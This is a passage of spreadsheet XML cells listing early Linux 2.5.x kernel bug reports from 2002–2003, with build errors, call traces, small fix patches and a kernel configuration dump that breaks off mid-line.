    <t>Exact Kernel version: 2.5.47-ac4 Distribution: Gentoo-1.4rc1 Hardware Environment: Pentium-III Software Environment: not relevant Problem Description: if [ -r System.map ]; then /sbin/depmod -ae -F System.map 2.5.47-ac4; fi depmod: *** Unresolved symbols in /lib/modules/2.5.47-ac4/kernel/drivers/pcmcia/pcmcia_core.o depmod: pcibios_read_config_dword This is in cistpl.c. For some reason, it's unchanged from 2.5.47, but doesn't manifest. Greg K-H had a patch on LKML a week or so ago. The patch looks something like this (partial diff against 2.5.44-ac5): @@ -430,7 +429,10 @@ #ifdef CONFIG_CARDBUS if (s-&gt;state &amp; SOCKET_CARDBUS) { u_int ptr; - pcibios_read_config_dword(s-&gt;cap.cb_dev-&gt;subordinate-&gt;number, 0, 0x28, &amp;ptr); + struct pci_dev *dev = pci_find_slot (s-&gt;cap.cb_dev-&gt;subordinate-&gt;number, 0); + if (!dev) + return CS_BAD_HANDLE; + pci_read_config_dword(dev, 0x28, &amp;ptr); tuple-&gt;CISOffset = ptr &amp; ~7; SPACE(tuple-&gt;Flags) = (ptr &amp; 7); } else Steps to reproduce: make modules_install # with pcmcia support as module</t>
  </si>
  <si>
    <t>2003-01-10 17:00 UTC</t>
  </si>
  <si>
    <t>OHCI-1394: sleeping function called from illegal context at mm/slab.c:1305</t>
  </si>
  <si>
    <t>IEEE1394</t>
  </si>
  <si>
    <t>2002-11-15 12:16 UTC</t>
  </si>
  <si>
    <t>2003-03-17 14:57 UTC</t>
  </si>
  <si>
    <t>Ben Collins</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.47-ac4 Distribution: Gentoo-1.4rc1 Hardware Environment: Intel(R) Pentium(R) III Mobile CPU 1000MHz GenuineIntel GNU/Linux 00:00.0 Host bridge: Intel Corp. 82830 830 Chipset Host Bridge (rev 02) 00:01.0 PCI bridge: Intel Corp. 82830 830 Chipset AGP Bridge (rev 02) 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 01) 00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 01) 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 01) 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 41) 00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 01) 00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 01) 00:1f.3 SMBus: Intel Corp. 82801CA/CAM SMBus (rev 01) 00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio (rev 01) 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility M6 LY 02:04.0 Communication controller: Conexant HSF 56k HSFi Modem (rev 01) 02:05.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 02:06.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 01) 02:08.0 Ethernet controller: Intel Corp. 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 41) Software Environment: Linux tweek.neosouth.net 2.5.47-ac4 #2 Fri Nov 15 14:53:35 EST 2002 i686 Gnu C 3.2 Gnu make 3.80 util-linux 2.11w mount 2.11w modutils 2.4.21 e2fsprogs 1.32 reiserfsprogs 3.6.4 pcmcia-cs 3.2.1 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 2.0.10 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0.15 Modules Loaded sr_mod ide-cd cdrom snd-pcm-oss snd-mixer-oss radeon hid agpgart af_packet uhci-hcd i810_rng ohci1394 ieee1394 e100 snd-intel8x0 snd-ac97-codec snd-pcm snd-timer snd-mpu401-uart snd-rawmidi snd-seq-device snd soundcore rtc ds yenta_socket pcmcia_core ide-scsi scsi_mod usbmouse usbcore mousedev Problem Description: ohci1394: $Rev: 601 $ Ben Collins &lt;bcollins@debian.org&gt; ohci1394_0: OHCI-1394 1.1 (PCI): IRQ=[10] MMIO=[d0214000-d02147ff] Max Packet=[2048] Debug: sleeping function called from illegal context at mm/slab.c:1305 Call Trace: [&lt;c01380a4&gt;] kmem_flagcheck+0x64/0x70 [&lt;c0138786&gt;] kmalloc+0x56/0xb0 [&lt;d09a9b8e&gt;] nodemgr_add_host+0x1e/0xf0 [ieee1394] [&lt;d09a6fd1&gt;] add_host+0x21/0xa0 [ieee1394] [&lt;d09a6678&gt;] highlevel_add_host_R69bc67d9+0x38/0x70 [ieee1394] [&lt;d09a60e4&gt;] hpsb_add_host_Rd6f5dce0+0x44/0x70 [ieee1394] [&lt;d09b4052&gt;] ohci1394_pci_probe+0x4b2/0x5e0 [ohci1394] [&lt;d09b23c0&gt;] ohci_irq_handler+0x0/0x500 [ohci1394] [&lt;d09b53d2&gt;] .rodata.str1.1+0x0/0x8e [ohci1394] [&lt;d09b61a0&gt;] ohci1394_pci_driver+0x0/0x94 [ohci1394] [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;c01db65e&gt;] pci_device_probe+0x5e/0x70 [&lt;d09b6160&gt;] ohci1394_pci_tbl+0x0/0x38 [ohci1394]Nov 15 14:56:11 tweek kernel: [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;c0223e55&gt;] bus_match+0x45/0x70 [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;c0223f92&gt;] driver_attach+0x72/0x90 [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;d09b61dc&gt;] ohci1394_pci_driver+0x3c/0x94 [ohci1394] [&lt;c02242ac&gt;] bus_add_driver+0x6c/0x90 [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;d09b53db&gt;] .rodata.str1.1+0x9/0x8e [ohci1394] [&lt;d09b61ec&gt;] ohci1394_pci_driver+0x4c/0x94 [ohci1394] [&lt;c02249c1&gt;] driver_register+0x91/0xa0 [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;c01db797&gt;] pci_register_driver+0x47/0x60 [&lt;d09b61c8&gt;] ohci1394_pci_driver+0x28/0x94 [ohci1394] [&lt;d09b44f3&gt;] ohci1394_init+0x13/0x40 [ohci1394] [&lt;d09b61a0&gt;] ohci1394_pci_driver+0x0/0x94 [ohci1394] [&lt;c011b4f9&gt;] sys_init_module+0x4e9/0x640 [&lt;d09b1060&gt;] get_phy_reg+0x0/0xd0 [ohci1394] [&lt;d09b56b4&gt;] .kmodtab+0x0/0xc [ohci1394] [&lt;d09b1060&gt;] get_phy_reg+0x0/0xd0 [ohci1394] [&lt;c010951b&gt;] syscall_call+0x7/0xb ieee1394: unsolicited response packet received - np ieee1394: contents: ffc00160 ffc00000 00000000 11970404 Author has been informed, says they are working on a fix. Also occurs in Linus' tree. Steps to reproduce: modprobe ohci1394</t>
  </si>
  <si>
    <t>Nathan W. Labadie</t>
  </si>
  <si>
    <t>Trond Myklebust</t>
  </si>
  <si>
    <t>Power-Processor</t>
  </si>
  <si>
    <t>Andy Grover</t>
  </si>
  <si>
    <t>af_key has broken sendmsg</t>
  </si>
  <si>
    <t>2002-11-15 14:01 UTC</t>
  </si>
  <si>
    <t>Taral</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 Problem Description: The implementation of sendmsg in af_key has a bad return value. It should return the length of the message on success, not 0.</t>
  </si>
  <si>
    <t>IPSEC tunnel mode broken</t>
  </si>
  <si>
    <t>2002-11-15 14:10 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 Problem Description: xfrm4_rcv doesn't handle tunnels properly. It needs to check for IPPROTO_IPIP, not IPPROTO_IP.</t>
  </si>
  <si>
    <t>compile error with CONFIG_HUGETLB_PAGE yes</t>
  </si>
  <si>
    <t>Sparc64 Linux</t>
  </si>
  <si>
    <t>2002-11-15 14:54 UTC</t>
  </si>
  <si>
    <t>Tom Duffy</t>
  </si>
  <si>
    <t>2003-06-17 15:58 UTC</t>
  </si>
  <si>
    <t>William Lee Irwin III</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.47 Distribution: debian Hardware Environment: ultra 10 Software Environment: Problem Description: compile problem when CONFIG_HUGETLB_PAGE is turned on seems that mainline linux defines htlbpage_max as an int and sparc64 as a long Steps to reproduce: config CONFIG_HUGETLB_PAGE yes, compile: sparc64-linux-gcc -Wp,-MD,arch/sparc64/mm/.init.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fno-common -m64 -pipe -mno-fpu -mcpu=ultrasparc -mcmodel=medlow -ffixed-g4 -fcall-used-g5 -fcall-used-g7 -Wno-sign-compare -Wa,--undeclared-regs -nostdinc -iwithprefix include -DKBUILD_BASENAME=init -c -o arch/sparc64/mm/init.o arch/sparc64/mm/init.c arch/sparc64/mm/init.c:1699: conflicting types for `htlbpage_max' include/linux/hugetlb.h:22: previous declaration of `htlbpage_max' make[1]: *** [arch/sparc64/mm/init.o] Error 1 make: *** [arch/sparc64/mm] Error 2</t>
  </si>
  <si>
    <t>2.5.47 DIO can't split IO correcly.</t>
  </si>
  <si>
    <t>DIO</t>
  </si>
  <si>
    <t>2002-11-15 15:40 UTC</t>
  </si>
  <si>
    <t>Badari Pulavarty</t>
  </si>
  <si>
    <t>2003-01-05 12:09 UTC</t>
  </si>
  <si>
    <t>Andrew Morton</t>
  </si>
  <si>
    <t>Here is the 2.5.47 patch to fix this. --- linux-2.5.47/fs/direct-io.c Fri Nov 15 15:16:14 2002 +++ linux/fs/direct-io.c Fri Nov 15 15:16:14 2002 @@ -426,6 +426,8 @@ dio-&gt;final_block_in_bio = dio-&gt;cur_page_block + (dio-&gt;cur_page_len &gt;&gt; dio-&gt;blkbits); ret = 0; + } else { + ret = 1; } return ret; } (Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>SMP Kernel Compile for Sparc32 fails</t>
  </si>
  <si>
    <t>SPARC32</t>
  </si>
  <si>
    <t>Sparc32 Linux</t>
  </si>
  <si>
    <t>2002-11-15 20:40 UTC</t>
  </si>
  <si>
    <t>Steven Stillaway</t>
  </si>
  <si>
    <t>2005-04-20 08:10 UTC</t>
  </si>
  <si>
    <t>Pete Zaitcev</t>
  </si>
  <si>
    <t>RTL8100BL (8139) do not work on acpi UP without local apic</t>
  </si>
  <si>
    <t>2.5.46-bk2 to 2.6.0-test3</t>
  </si>
  <si>
    <t>2002-11-16 04:24 UTC</t>
  </si>
  <si>
    <t>2004-03-03 14:46 UTC</t>
  </si>
  <si>
    <t>[ This is just a rehash of the networking part of bug #10 so people not interested in the usb part can follow this bug. While bug #10 form may have been good for linux-kernel, compound bugs are really not a good bugzilla practice ] Exact Kernel version: 2.5.46-bk2 + about a dozen 2.5/2.5-ac kernels I've tried in the 2.5.44-2.5.47 range Distribution: Red Hat Raw Hide Hardware Environment: Gigabyte GA -7VAX http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL), F6 bios Problem Description: When I build a 2.5 acpi kernel without local apic, network initialization fails with a timeout. Enabling local apic kills usb. nov 5 20:50:30 rousalka ifup: nov 5 20:50:30 rousalka ifup: D</t>
  </si>
  <si>
    <t>PA-RISC</t>
  </si>
  <si>
    <t>2003-02-20 19:12 UTC</t>
  </si>
  <si>
    <t>Unresolved symbols in kernel/drivers/char/raw.o in 2.5.47 (CONFIG_RAW_DRIVER=m)</t>
  </si>
  <si>
    <t>2002-11-17 08:29 UTC</t>
  </si>
  <si>
    <t>2002-12-09 20:08 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.47 Distribution: Gentoo 1.4 Hardware Environment: Software Environment: GCC 3.2 Problem Description: When compiling CONFIG_RAW_DRIVER=m, I'm getting the following after doing a 'make modules_install': ---snip--- depmod: *** Unresolved symbols in /lib/modules/2.5.47/kernel/drivers/char/raw.o depmod: blkdev_ioctl ---snip--- Steps to reproduce: Enable CONFIG_RAW_DRIVER=m and compile, followed by 'make modules_install'.</t>
  </si>
  <si>
    <t>Unresolved symbols in kernel/fs/binfmt_aout.o in 2.5.47 (CONFIG_BINFMT_AOUT=m)</t>
  </si>
  <si>
    <t>2002-11-17 08:33 UTC</t>
  </si>
  <si>
    <t>2002-12-09 20:11 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.47 Distribution: Gentoo 1.4 Hardware Environment: Software Environment: GCC 3.2 Problem Description: When CONFIG_BINFMT_AOUT=m is compiled, I'm getting the following error during a 'make modules_install': ---snip--- depmod: *** Unresolved symbols in /lib/modules/2.5.47/kernel/fs/binfmt_aout.o depmod: ptrace_notify ---snip--- Steps to reproduce: Enable CONFIG_BINFMT_AOUT=m. The error is generated during 'make modules_install'.</t>
  </si>
  <si>
    <t>Double unlock in ah.c/esp.c</t>
  </si>
  <si>
    <t>2002-11-18 00:26 UTC</t>
  </si>
  <si>
    <t>2003-06-27 08:26 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Problem Description: ah.c and esp.c contain a double free Patch upcoming</t>
  </si>
  <si>
    <t>qconf crashes when setting default NLS</t>
  </si>
  <si>
    <t>Configuration</t>
  </si>
  <si>
    <t>2002-11-18 06:28 UTC</t>
  </si>
  <si>
    <t>Luca Barbieri</t>
  </si>
  <si>
    <t>2003-01-05 11:46 UTC</t>
  </si>
  <si>
    <t>Roman Zippel</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Problem Description: qconf segfaults after I change the default NLS and hit enter. Steps to reproduce: 1. Start editing the "Default NLS" option under Filesystems 2. Change it (e.g. "utf8") 3. Press the Enter key</t>
  </si>
  <si>
    <t>Device mapper fails to build - link errors on vcalloc</t>
  </si>
  <si>
    <t>LVM2/DM</t>
  </si>
  <si>
    <t>2002-11-18 07:59 UTC</t>
  </si>
  <si>
    <t>Dr. David Alan Gilbert</t>
  </si>
  <si>
    <t>2002-12-03 21:25 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution: standard ftp.kernel.org Hardware Environment: dual athlon Software Environment: Debian/sid Problem Description: Enabling BLK_DEV_DM causes the link error: drivers/built-in.o(.text+0x9769d): In function `alloc_targets': : undefined reference to `vcalloc' drivers/built-in.o(.text+0x980f9): In function `setup_indexes': : undefined reference to `vcalloc' Steps to reproduce: enable BLK_DEV_DM</t>
  </si>
  <si>
    <t>2.5.48 make bzImage fails on fs/devfs/base.c</t>
  </si>
  <si>
    <t>devfs</t>
  </si>
  <si>
    <t>2002-11-18 08:31 UTC</t>
  </si>
  <si>
    <t>Mohamed El Ayouty</t>
  </si>
  <si>
    <t>2002-12-18 14:28 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution: Gentoo Hardware Environment: Pentium 3 Software Environment: gcc-2.95.3 Problem Description: make bzImage fails on devfs compile: fs/devfs/base.o fs/devfs/base.c fs/devfs/base.c: In function `devfs_symlink': fs/devfs/base.c:3032: incompatible types in assignment fs/devfs/base.c:3033: incompatible types in assignment fs/devfs/base.c:3034: incompatible types in assignment fs/devfs/base.c: In function `devfs_mkdir': fs/devfs/base.c:3063: incompatible types in assignment fs/devfs/base.c:3064: incompatible types in assignment fs/devfs/base.c:3065: incompatible types in assignment fs/devfs/base.c: In function `devfs_mknod': fs/devfs/base.c:3132: incompatible types in assignment fs/devfs/base.c:3133: incompatible types in assignment fs/devfs/base.c:3134: incompatible types in assignment make[2]: *** [fs/devfs/base.o] Error 1 make[1]: *** [fs/devfs] Error 2 make: *** [fs] Error 2 Steps to reproduce: Include devfs in kernel, and make bzImage</t>
  </si>
  <si>
    <t>IEEE-1394 not selectable for Alpha (patch Included)</t>
  </si>
  <si>
    <t>Alpha</t>
  </si>
  <si>
    <t>2002-11-18 09:29 UTC</t>
  </si>
  <si>
    <t>Leslie Donaldson</t>
  </si>
  <si>
    <t>2002-12-03 21:28 UTC</t>
  </si>
  <si>
    <t>Richard Henderson</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution: redhat / rawhide Hardware Environment: 164LX alpha Software Environment: rawhide Problem Description: The IEEE-1394 is not avaliable I have submitted patch below to solve this. Steps to reproduce: --- linux-2.5.48/arch/alpha/defconfig 2002-11-16 13:12:34.000000000 -0800 +++ linux-2.5.48/arch/alpha/defconfig 2002-11-17 20:29:45.000000000 -0800 @@ -364,6 +364,11 @@ # CONFIG_FUSION_LAN is not set # +# IEEE 1394 (FireWire) support (EXPERIMENTAL) +# +# CONFIG_IEEE1394 is not set + +# # Network device support # CONFIG_NETDEVICES=y --- linux-2.5.48/arch/alpha/Kconfig 2002-11-17 20:29:51.000000000 -0800 +++ linux-2.5.48/arch/alpha/Kconfig 2002-11-18 08:20:10.000000000 -0800 @@ -806,6 +806,8 @@ source "drivers/message/fusion/Kconfig" endif +source "drivers/ieee1394/Kconfig" + source "net/Kconfig"</t>
  </si>
  <si>
    <t>writing to sysfs appears to hang</t>
  </si>
  <si>
    <t>SysFS</t>
  </si>
  <si>
    <t>2002-11-18 09:32 UTC</t>
  </si>
  <si>
    <t>2003-01-06 07:24 UTC</t>
  </si>
  <si>
    <t>Patrick Mochel</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.47 (and all others since then I've tested) Distribution: SuSE 8.0 Hardware Environment: 2-way PIII-550 Software Environment: Problem Description: I've been playing with sysfs and notices something odd. If I do this: echo 1 &gt; /sys/devices/sys/name the process appears to be hung. ^c won't return control to me. If I log in on another console though, I can't find it running in the process list. All I can do is kill the login process. No kernel errors when I do this, just the hung terminal. Steps to reproduce: mount -tsysfs none /sys echo 1&gt; /sys/devices/sys/name</t>
  </si>
  <si>
    <t>isa_bridge a macro or a structure - failure to build</t>
  </si>
  <si>
    <t>SPARC64</t>
  </si>
  <si>
    <t>2002-11-18 12:41 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution: standard ftp.kernel.org Hardware Environment: sparc ultra1 Software Environment: debian/sid Problem Description: Failure to compile; failure is while compiling arch/sparc64/kernel/time.c In file included from arch/sparc64/kernel/time.c:36: include/asm/isa.h:16: parse error before `(' include/asm/isa.h:16: warning: no semicolon at end of struct or union Looking at postprocessed output we see that isa.h defines the struct isa_bridge but something else has #defined it to ((struct pci_dev *)((void *)0) ) Steps to reproduce: Fairly boring ultrasparc build; PCI is not enabled (for an Ultra 1).</t>
  </si>
  <si>
    <t>2.5.48 bttv module compile error</t>
  </si>
  <si>
    <t>2002-11-18 13:32 UTC</t>
  </si>
  <si>
    <t>John Kim</t>
  </si>
  <si>
    <t>2003-02-21 12:05 UTC</t>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.5.48 Distribution: Gentoo Hardware Environment: AMD TBird, Abit KG7-RAID Software Environment: Gentoo 1.4rc1, gcc 3.2 Problem Description: gcc -Wp,-MD,drivers/media/video/.bttv-cards.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iarch/i386/mach-generic -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=bttv_cards -DKBUILD_MODNAME=bttv -c -o drivers/media/video/bttv-cards.o drivers/media/video/bttv-cards.c drivers/media/video/bttv-cards.c: In function `miro_pinnacle_gpio': drivers/media/video/bttv-cards.c:1742: `AUDC_CONFIG_PINNACLE' undeclared (first use in this function) drivers/media/video/bttv-cards.c:1742: (Each undeclared identifier is reported only once drivers/media/video/bttv-cards.c:1742: for each function it appears in.) drivers/media/video/bttv-cards.c: In function `bttv_check_chipset': drivers/media/video/bttv-cards.c:2993: structure has no member named `name' make[3]: *** [drivers/media/video/bttv-cards.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_SWAP=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_NET=y CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_KMOD=y # # Processor type and features # # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y # CONFIG_X86_UP_APIC is not set CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_CPU_FREQ is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # # # ACPI Support # # CONFIG_ACPI is not set # CONFIG_PM is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_SCx200 is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=m # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m # CONFIG_PARPORT_PC is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play configuration # # CONFIG_PNP is not set # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL device support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDEFLOPPY is not set CONFIG_BLK_DEV_IDESCSI=m # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y # CONFIG_BLK_DEV_GENERIC is not set CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set CONFIG_BLK_DEV_HPT366=y # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NFORCE is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # CONFIG_SCSI=m # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=m # CONFIG_BLK_DEV_SR_VENDOR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y # CONFIG_SCSI_REPORT_LUNS is not set CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_MEGARAID is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_CPQFCTS is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_DMA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_GENERIC_NCR5380_MMIO is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_IMM is not set # CONFIG_SCSI_NCR53C7xx is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_NCR53C8XX is not set # CONFIG_SCSI_SYM53C8XX is not set # CONFIG_SCSI_PCI2000 is not set # CONFIG_SCSI_PCI2220I is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # CONFIG_IEEE1394=m # # Device Drivers # # CONFIG_IEEE1394_PCILYNX is not set # CONFIG_IEEE1394_OHCI1394 is not set # # Protocol Drivers # # CONFIG_IEEE1394_SBP2 is not set # CONFIG_IEEE1394_ETH1394 is not set # CONFIG_IEEE1394_RAWIO is not set # CONFIG_IEEE1394_CMP is not 